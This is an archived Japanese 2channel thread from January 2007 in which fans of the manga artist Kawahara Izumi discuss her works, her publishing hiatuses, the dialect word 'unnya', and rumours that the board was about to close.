どうやったらそんな超マイナー情報がわかるんだよwww

333 :花と名無しさん:2007/01/08(月) 21:05:27 ID:???O
川原さん 一応有名漫画家の部類に入るんじゃね?
柴門ふみとか 一条ゆかりとか あそこまではいかないけどさ
白泉社ではエース?だし

334 :花と名無しさん:2007/01/08(月) 21:07:22 ID:???0
>>331
エディと呼んでくださいって言ってる人だよね?>クリスチャン
何て名前だったっけ…

335 :花と名無しさん:2007/01/08(月) 21:13:39 ID:???0
ジャンボリーな人はなんだっけ

336 :花と名無しさん:2007/01/08(月) 21:29:03 ID:???0
たろさ??

337 :花と名無しさん:2007/01/08(月) 21:55:39 ID:???0
見えるw

338 :花と名無しさん:2007/01/08(月) 21:57:13 ID:???0
>>335
どんちゃんだよ。

「花とむし」で橘いさぎの担当さんだった人。

339 :花と名無しさん:2007/01/08(月) 21:57:29 ID:???0
>>337
誤爆です

340 :花と名無しさん:2007/01/08(月) 22:48:36 ID:???0
ところで、東京では’うんにゃ’っていわないの?
かーら君の漫画によく出てるから通じるとおもって…
それで爆笑された

341 :花と名無しさん:2007/01/08(月) 22:54:10 ID:???O
爆笑でよかったね
イタイ人だと思われたんじゃなくて

342 :花と名無しさん:2007/01/08(月) 22:56:26 ID:???0
>>340
漫画では見たけど、リアルで使ってる人は見たことない。
@神奈川県東南部(ここらの方言は、SMAP中居と香取とほぼ同じ)
東京では、いわゆるホンモノの江戸っ子は少ないので
標準語+TVに影響された言葉使いが流通していそう。

343 :花と名無しさん:2007/01/08(月) 22:58:25 ID:???0
福岡南部では使うね>うんにゃ
しかし2chにのほほんレスってなんか痒い感じだw

344 :花と名無しさん:2007/01/08(月) 22:59:02 ID:???0
えーうんにゃって方言なんだ。
普通に使ってた。気をつけよう・・・

345 :花と名無しさん:2007/01/08(月) 23:21:09 ID:???O
名古屋の人が使ってた。ほんとに普通に使ってますか?名古屋の方。

346 :花と名無しさん:2007/01/08(月) 23:38:02 ID:???0
>330
めがねの人はメロディの編集長にまで出世したから違うんじゃ?

347 :花と名無しさん:2007/01/08(月) 23:40:26 ID:???0
>>346
おおスゴイですな

348 :花と名無しさん:2007/01/09(火) 01:01:22 ID:???0
>>340です。
うんにゃ は宮崎、鹿児島ではフツーに使ってます。
ほんきで全国に通用するとおもってた…
はずかしかー

349 :花と名無しさん:2007/01/09(火) 01:31:16 ID:???0
>>340
東京出身東京育ちですが、うちの家族(代々江戸っ子)はフツーに使ってます。
でも友達は全く使わないから、東京では少数派かも。

350 :花と名無しさん:2007/01/09(火) 02:04:49 ID:???0
会社の上司(30代前半男・関東)が普通に使ってる。>うんにゃ

http://www.37vote.net/anime/1168084494/

351 :花と名無しさん:2007/01/09(火) 04:36:41 ID:???0
要は>>341ほど気にしなくていいってことか

352 :花と名無しさん:2007/01/09(火) 06:37:34 ID:???0
うんにゃ の検索結果のうち 日本語のページ 約 229,000 件中 1 - 50 件目 (0.05 秒)

353 :花と名無しさん:2007/01/09(火) 08:44:34 ID:???0
何年かぶりに「美貌の果実」を読んだんだけど、貴さんが
「あれが一番こたえたはずだから」と言うシーンが切なかった

年を取ったせいか、実の子に「おばしゃん」と呼ばれた実母の
気持ちが忖度できるようになったんだなぁ・・・

354 :花と名無しさん:2007/01/09(火) 16:38:41 ID:???0
「美貌の果実」の七実ちゃんのお母さんの事だけど、娘と赤ちゃんの頃から会っていなければ
(正確には会わせてもらえなければ)自分の娘だと気付かないものなのかな?

355 :花と名無しさん:2007/01/09(火) 16:49:04 ID:???0
>>354
歯が生える前後と、寝かせっきりの状態から立って歩くようになる前後、
あと言葉で意思の疎通ができる前後で、子供の顔立ちや体格は、かなり
劇的に変わるからね(歯が生えそろうと、ふにゃっとしてた顔つきが相当
引き締まる)。

七実ちゃんの母は、ほんとに赤ん坊の頃の七実ちゃんを置いて出奔した
みたいだし、いくら赤ちゃんの頃を覚えていても、そこから一気に幼稚園児
に成長した子供を見ても、「同じ年頃だ」とは思ってもとっさに結び付けられ
ない、ってのはあるかも。

あと、子供を捨てて家を出たことが罪の意識になってて、意図的に子供の
ことを考えないようにしてた、ってのもあるかもね。

356 :花と名無しさん:2007/01/09(火) 18:00:17 ID:???0
とっさに分かるかどうかというのはともかくとして、物語の中で
七実ちゃんを探してた時は、「貴さんの娘の七実」ということで
探していたはずだから、自分の娘だと分かってたろうね
それだけに「ばいはい おばしゃん」は堪えるだろう

357 :花と名無しさん:2007/01/09(火) 18:43:21 ID:???0
あれってかなり好きな作品の一つではあるけど
すっげーキツイしああ見えてかなり生々しい話だよね……(>_<)
ばいばいおばしゃんはキツすぎて血が出そうだよ……

358 :花と名無しさん:2007/01/09(火) 19:28:21 ID:???O
>>357
(´・ω・`)つ□←ハンカチ

359 :花と名無しさん:2007/01/09(火) 19:48:41 ID:???0
今は文庫だけになっちゃってるけど
鼻と夢コミックスはこの先再販される予定ないのかね?
持ってるやつが随分焼けてきちゃってて・・・・。
あのカラフルな表紙が好きなんだよなあ。

360 :花と名無しさん:2007/01/09(火) 19:54:11 ID:???0
>>359
文庫化時点=コミックス絶版の作品の場合でのコミックス再販は
難しいんじゃない?
文庫化時点ではコミックス絶版になっていない作品てのも、時々あるけど…。

361 :花と名無しさん:2007/01/10(水) 02:22:59 ID:???0
コミックスはまだ絶版になっていないんじゃなかったかな。

362 :花と名無しさん:2007/01/10(水) 04:29:56 ID:???0
いや初期のはほとんど絶版でしょ。

363 :花と名無しさん:2007/01/10(水) 12:50:41 ID:???0
ケンタッキーのCMに出てくるおじさんがかぶってる帽子に
JAPAN FARMと書いてあるのはガイシュツ?

川原さんの作品で一番切ないのは銀のロマンティックだなぁ。
うまく説明できないけど…。

364 :花と名無しさん:2007/01/10(水) 13:11:55 ID:???0
>>363
あの「わはは」顔でのスケーティングシーンで泣かせるって
すごいことだよね……やっぱ好きな作品多いなあ。

365 :花と名無しさん:2007/01/10(水) 14:37:24 ID:???0
最初に読んだ川原作品って覚えてる?

私は「笑う大天使」の二話、体育の時間に史緒さんと和音さんが競争するところだった。
五十音順の名簿なのに、佐々木、更科、斎木、司城になってて違和感を覚えたんだけど
そんなことに関係なく理屈抜きで面白くて川原泉にハマってしまった

それから全巻持ってた友人に借りて読んで、結局全ての単行本を買い集めてしまった。
でも、「アーチ・エンジェル」というルビが修正されていてガッカリした覚えがあるw

366 :花と名無しさん:2007/01/10(水) 15:24:40 ID:???0
わかった!
和音の姓は「さいき」、じゃなくて「さゐき」なんだよ!>読み

367 :花と名無しさん:2007/01/10(水) 15:26:06 ID:???0
最初はたぶん「甲子園の空に笑え!」
あれはいいね。あれとミカエルとメイプーは当時からの
黄ばんだコミックスのままでw永久保存版扱いにしてる。

368 :花と名無しさん:2007/01/10(水) 15:29:34 ID:???O
私は、転校生なのに普通に五十音順名簿に名前が組み込まれていることに違和感を感じたぞ。
大抵の場合はやむおえず末尾に追加されてたから。
まぁ、演出上なくてはならなかったんだろうけど。

369 :花と名無しさん:2007/01/10(水) 16:37:09 ID:???0
雑誌でパラ見した時は作者名とか特に気にとめてなかったんだけど、
多分最初の川原マンガは「真実のツベルクリン反応」だった。

最後のコマの「なんか ふつーでいいですねえ」ってナレーションが
妙に印象に残ってて、ずっと後になって食欲魔人シリーズの特集で
興味持って単行本買ったら入ってて、「ああ、コレカー!」と。

370 :花と名無しさん:2007/01/10(水) 17:16:03 ID:???0
私は友人から借りたカレーの王子様だな。
あのコミックは食べ物が実にうまそうな話ばかりで
何度も読み直したよ

371 :花と名無しさん:2007/01/10(水) 17:26:20 ID:???O
ジュリエット白書。
ただ、この新人面白いなと思ったまま、花ゆめを定期購読してないから忘れてた。
次に意識したのは「進駐軍に言うからねっ!」。
同じ作者と知ったのは、コミックスに「ジュリエット白書」が収録されてからだった。

372 :花と名無しさん:2007/01/10(水) 17:57:38 ID:???0
>>371
同じくジュリエット白書。
最後までオチが読めないマンガってのは初めてだったんで
凄く衝撃的だったのを覚えてる。
でも自分も花ゆめを定期購読してなかったんで、ある時友人に
「最近、川原泉って漫画家が面白いんだけど知ってる?」って
聞かれて「どっかで聞いた名前だな?ああ、あの!」って思い出して
それからハマった。


373 :花と名無しさん:2007/01/10(水) 20:34:29 ID:???0
ああすべてが懐かしい

374 :花と名無しさん :2007/01/10(水) 20:59:30 ID:???0
「夢だっていいじゃない」が最初
キャラクターの関係が全然分からなかったけど、今まで読んだことないマンガだった
ものすごくハマってあっという間に全部のコミックスそろえた
「フロイト1/2」と「かぼちゃ計画」は読了後、しばしぼーっとしてしまった
「銀のロマンチック、わはは」「森には真理が落ちている」「三月革命」には落涙

375 :花と名無しさん:2007/01/10(水) 21:20:19 ID:???0
デビュー当時から見てた人も多いねぇ・・・

今月引っ越すんで荷物を整理してるんだけど、
川原漫画は絶対に捨てられないな

376 :花と名無しさん:2007/01/10(水) 21:32:06 ID:???0
「バビロンまでは何マイル?」、扉絵の歴史イベント全部やってほしかったなあ。

377 :花と名無しさん:2007/01/10(水) 21:35:12 ID:???0
なんでバビロン終わらせられなかったんだろう
単に人気無かっただけかね?

378 :花と名無しさん:2007/01/10(水) 21:41:33 ID:???0
バビロンの後、メイプルの連載が入った記憶があるが
なんでメイプルのほうが優先されたんだろう??

379 :花と名無しさん:2007/01/10(水) 21:45:05 ID:???0
バビロン面白かったのにね。

でもここで教えてもらったおかげで文庫版ゲトして
一応の完結するところまで読めたよアリガトン。


380 :花と名無しさん:2007/01/10(水) 22:16:34 ID:???0
「カレーの王子さま」を勧められて(というか貸してもらって)
読んだのが初めてだったなあ……
ものすごく独創的だと思った

381 :花と名無しさん:2007/01/11(木) 01:27:36 ID:???0
花夢本誌でかぼちゃ計画読んだのが最初だ
サッカーのネットが碁盤の目に見えたとかそいつは許せんなとかで大笑いして
いつだってかぼちゃ計画…のあたりでうるっときたよ。

382 :花と名無しさん:2007/01/11(木) 05:02:09 ID:???O
近所の古本屋で花ゆめ版が全巻セット280円で売られたのを何となく買ったのが最初だ。
最初に読んだのは美貌の果実、即効全巻読破。バビロン続巻を探して翌日彷徨った。
多分我が生涯で一番コストパフォーマンスのいい買い物。手放せないな、280円だったけど。

383 :花と名無しさん:2007/01/11(木) 10:25:34 ID:???0
全巻セットが280円とはすごい価格の付け方だな

384 :花と名無しさん:2007/01/11(木) 10:55:49 ID:???0
高校時代、壊滅的に理数ができなかった私に
文系学科ではライバルだった優等生男子が
「これお前みたい。オレも一応期待してんだけど無理っぽいなあ」と
「たじろぎの因数分解」が入ったコミックスを貸してくれた

お姉さんの蔵書を時々読んでて
あー、あいつみたい、と思っていたそうだ
これきっかけに理数教えてもらったりしたが
恋心も湧かず、成績も当然ながら地を這ったままだった
でもあの補修のおかげで仮進級だった数学の追試はクリアしたから
優等生男子と川原さんの漫画は恩人だ

385 :花と名無しさん:2007/01/11(木) 12:34:22 ID:???0
最近ほとんど読んでないんだけど
恋愛風味は完全に殺ぎ落とされたままなんだろうか
昔の何気にほんのり恋愛してるところにほのぼのしてたんだが
それに絡んだ人間観察考察な語りも面白かった


386 :花と名無しさん:2007/01/11(木) 14:50:15 ID:???0
今の連載は、恋愛メインじゃないかと思うよ。一応。

387 :花と名無しさん:2007/01/11(木) 20:35:45 ID:???0
むしろ、恋愛対象に関する観察考察的な語りが
メインになってきてる、感じかな。

少なくとも、「〜がある」シリーズはそんな雰囲気。

388 :花と名無しさん:2007/01/11(木) 22:37:00 ID:???O
サルとかウサギとかバジリスクとか出てきたから、てっきりブレーメンの続編なのかと思ってた・・・

389 :花と名無しさん:2007/01/11(木) 22:40:01 ID:???0
ブレーメンの続編読みたいな〜
最近の作品では一番好きだ

390 :花と名無しさん:2007/01/12(金) 01:22:17 ID:???O
話豚切るんだけど 昔 漫画好きの友人から

漫画家が原稿を落とした場合かなりの大物でも何年間かは仕事を干される(江口寿史も何年も干されたとか…)

って聞いたんだけど 川原さんは大丈夫なんだろうか?
ずいぶん前に落とした時はどうだったか覚えてる人いませんか?
それに今回はどうなるんだろう?
気になるw

391 :花と名無しさん:2007/01/12(金) 02:43:24 ID:???0
>>390
江口の落としっぷりはハンパじゃなかったようだから程度問題じゃね?

392 :花と名無しさん:2007/01/12(金) 08:57:49 ID:???0
>>390
しょっちゅう落として「白いワニが出る」なんて言われたら
干すというより、頼みたくもなくなる罠

393 :花と名無しさん:2007/01/12(金) 09:10:14 ID:???0
パンダの足音


まぁぶっちゃけ落とされると印刷所からも営業からも叩かれて
恨み倍増……なので、編集の意向によっては干される可能性は
結構ある。
干されるかどうかは読者人気・売上貢献度・編集の感情による。
ぺーならもちろんイチコロ。


394 :花と名無しさん:2007/01/12(金) 18:48:03 ID:???0
原稿落とす人より、何ヶ月も何年も連載を休止させる漫画家のほうがry

395 :花と名無しさん:2007/01/12(金) 23:13:28 ID:???0
>390
ふるいにかけられてる新人漫画家じゃないし、
今まで落とした実績もあるんで
編集側もある程度は覚悟してたんじゃないのかな〜。
ブレーメンも減ページあったけど連載続いたし、
今も描いてるわけだから干されることはないんじゃないの。

396 :花と名無しさん:2007/01/13(土) 02:43:35 ID:???O
一時期数年間描いてない時期なかった?
うろ覚えなんだけど

397 :花と名無しさん:2007/01/13(土) 03:12:25 ID:???0
甲子園〜ブレーメンの間?
絵柄がと作風が急に変わったのってブレーメンからだよね。

398 :花と名無しさん:2007/01/13(土) 03:13:12 ID:???0
ごめん、文章変だったw

399 :花と名無しさん:2007/01/13(土) 11:41:28 ID:???0
>397
間に小人たち〜を描いてた。
絵が変わったのはこの頃。
その前はエッセイ(事象の地平)の連載だけしてたよね。

400 :花と名無しさん:2007/01/13(土) 11:51:50 ID:???0
>>384
川原泉の漫画みたいな関係だな。

401 :花と名無しさん:2007/01/13(土) 14:32:46 ID:???0
>396>397
メイプル戦記連載中に1年以上休んでました。
何度か復帰しかけては予告だけで終わったり、途中で落としてまた今度、
となったりしていたような記憶があります。
そして途中でヴァンデミエールを発表しようとして、
カラーページ(扉とその裏)だけ載って落としてました。

>399
小人たちはメイプル完結後だったはず。
事象の地平はメイプルの連載中でしたっけ?

402 :花と名無しさん:2007/01/13(土) 14:38:21 ID:???0
バビロンは?

403 :花と名無しさん:2007/01/13(土) 14:52:46 ID:???O
仲良しだった三原順さんが亡くなって
精神的に落ちてる時期だったのかな
…と個人的には思っていた

404 :花と名無しさん:2007/01/13(土) 15:41:55 ID:???0
「バビロン」で描いちゃいけないものを描いた(兄と妹の近親相姦)
せいだと分析している人もいた。
たしかにブラコンだよなこの作者。

405 :花と名無しさん:2007/01/13(土) 17:45:52 ID:???O
>>401
dクス
記憶が曖昧で気持ち悪かったんだけど すっきりしますた

406 :花と名無しさん:2007/01/13(土) 20:12:22 ID:???0
ヴァンデミエールの翼が売ってないな

407 :花と名無しさん:2007/01/14(日) 01:26:39 ID:???0
>>401
d!

川原さんはブレーメンから知ったし、コミックス派なので
こんなに色々あったなんて驚きました。

408 :花と名無しさん:2007/01/14(日) 09:50:15 ID:WpoKug58O
2ちゃんねるが閉鎖されたら、
3ちゃんねるで会いましょうね。

409 :花と名無しさん:2007/01/14(日) 10:33:17 ID:???O
閉鎖ほんと?なんか諸説飛びかってるけど。

410 :花と名無しさん:2007/01/14(日) 13:23:34 ID:???0
ここで聞くなよ。
いろんなスレあるんだから調べたらいいさ。

411 :花と名無しさん:2007/01/14(日) 14:34:49 ID:???0
もしものために避難所とかあるといいかなととりあえず
http://levelup.jp/

412 :花と名無しさん:2007/01/14(日) 14:49:34 ID:???O
411乙!ありがとん!
いろんなスレを見て諸説飛びかうと思ったわけなんだが。

413 :花と名無しさん:2007/01/14(日) 17:52:40 ID:???O
明日、15日閉鎖って話も出てるね。
ν速とか、スレの消費スピードが速い速いw

414 :花と名無しさん:2007/01/15(月) 22:13:06 ID:???O
とりあえずまだあったw
はらへった。ぬくい薩摩汁が食いたい。

415 :花と名無しさん:2007/01/15(月) 22:26:06 ID:???0
ぬるいコーヒー牛乳も飲んでください

416 :花と名無しさん:2007/01/15(月) 22:59:20 ID:???0
とある茶店で「カフェラテてなんですか?」と出てき始めの頃聞いたら
「ぬくいコーヒー牛乳です」と若いお姉ちゃんに的確な説明されたことがあった。
……読んでたんだろうか…

417 :花と名無しさん:2007/01/15(月) 23:54:33 ID:???0
ワロタ

418 :花と名無しさん:2007/01/16(火) 23:44:01 ID:???0
>>393
原稿を落とす事に限らず、漫画家が何らかの理由で編集の怒りを買えば、干されてしまうよね。
Young YouやFeel Youngに「めぐ&幸弘ちゃんシリーズ」を連載していた原田智子は未だに業界から干されている身だし。

419 :花と名無しさん:2007/01/17(水) 01:11:54 ID:???0
>>418
あれは敵に回した相手がデカすぎたな…

420 :花と名無しさん:2007/01/17(水) 01:26:53 ID:???0
スレ違いかもだが、いったい何をやらかしたの?

421 :花と名無しさん:2007/01/17(水) 02:39:12 ID:???0
>>420
知ったのが回収されたあとだったので詳しくは知らんが
皇太子をおちょくった内容だったので出版社がビビッた
皇室が正式に抗議したとかいうことではないようだ

422 :花と名無しさん:2007/01/17(水) 05:28:05 ID:???O
回収ってw
載る・載せる前に何とかしとけよ、って話じゃないのかそれはw
会社は雑誌が出てor刷り上がってから内容知ったってことか。
作家と編集部の暴走(?)ってことなのかな。

423 :花と名無しさん:2007/01/17(水) 07:38:03 ID:???O
昔、あかぼしたみこの「恋はいつもアマンドピンク」に
皇太子クリソツのキャラが出ていたが…
主人公と夜の営みなどいたしていたが…
ただ顔を似せるだけなら大丈夫なのだな
一般誌で皇室関係おちょくったらいかんよなぁ

424 :花と名無しさん:2007/01/17(水) 09:52:22 ID:???0
>>421
サンクス
まぁ、それは確かにまずそうだ……w

425 :花と名無しさん:2007/01/17(水) 11:18:21 ID:???0
>>422
作家の暴走だろうね。
共産党の機関紙赤旗にマンガ描いてた人だし(今は知らん)。
編集はたいがいバカや悪人に描かれてたし
そんなことがなくてもいずれ切られる運命だったんだろうさ。
めぐと幸弘ちゃんシリーズや僕は薔薇、好きだったんだけどね…

426 :花と名無しさん:2007/01/17(水) 22:13:43 ID:???0
編集だけじゃなくて、めぐの同級生達や同僚、近所の奥様方も
バカや悪人に描かれていたけどね。
川原マンガを読んだ後に読むとつらくなる事があったよ。好きだったけど・・・

427 :花と名無しさん:2007/01/18(木) 00:27:26 ID:???0
他所の赤い漫画家なんてどうでもいいがな

428 :花と名無しさん:2007/01/18(木) 10:20:24 ID:???O
朝からずーっとあるCMソングが頭の中を駆け巡ってるんですが、これってなんて名前の効果(現象?)でしたっけ?

事象の地平に載ってたと思うんですが、実家に置いてきてるもんで…。

♪ポリンキー、ポリンキー、三角形の秘密はね♪

429 :花と名無しさん:2007/01/18(木) 10:36:03 ID:???0
ディラン効果

♪たーらこーたーらこーたっぷりたらこー
すきじゃないのに頭に続けて浮かぶフレーズ



430 :花と名無しさん:2007/01/18(木) 13:12:23 ID:???O
あーっ!それそれ!

ディラン効果!

ありがとう!スッキリした!

431 :花と名無しさん:2007/01/21(日) 22:17:12 ID:???0
ディラン・ディラン

432 :花と名無しさん:2007/01/22(月) 01:39:15 ID:???0
それを言うならデュラン・デュラン…はて、デジャブを感じるのぉ

433 :花と名無しさん:2007/01/22(月) 23:58:01 ID:???0
ジェーン・フォンダがどうしましたか?

434 :花と名無しさん:2007/01/23(火) 00:52:28 ID:???0
バーバレラ!

435 :花と名無しさん:2007/01/23(火) 14:11:51 ID:???0
アーティストじゃなくてそちらにいきましたかw
「バーバレラ」が元ネタなんだけどね。

436 :花と名無しさん:2007/01/24(水) 00:10:12 ID:???O
てえー         てえー         てえー

437 :花と名無しさん:2007/01/24(水) 07:16:20 ID:???0
ダミアン キタ Y⌒Y⌒Y⌒Y⌒Y⌒Y⌒(。A。)!!

438 :花と名無しさん:2007/01/24(水) 18:04:34 ID:???0
既出かもしれないけど、ひさしぶりにメイプル読み返して
柴と石河がいたのにちょっと吃驚。
当時は全然気が付かなかった。

読み飛ばしてたんだな・・・・。
そういやその時期から教授より他の漫画家に移行し始めてた・・・。
読み返すと面白かったりするんだけど、もっと高いレベルを要求したくなる。
ファンって鬼だと思った。


439 :花と名無しさん:2007/01/24(水) 23:23:58 ID:???0
>>436
誰だ!ここのスレに麦チョコをばらまいた人は!?

440 :大規模なチョコレート中毒:2007/01/24(水) 23:41:31 ID:???0
昨夜未明、市内全域で
200匹以上の犬や猫などが
チョコレートによる
中毒症状を引き起こし

これまでに犬・猫12匹の
死亡が確認されました。

チョコレートには
犬・猫などが分解できない
「テオブロミン」が含まれ、
今回の中毒数の多さから
それを知っての犯行と…

441 :花と名無しさん:2007/01/25(木) 03:02:31 ID:???0
知らなかった・・・
知らなかったの・・・

87 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)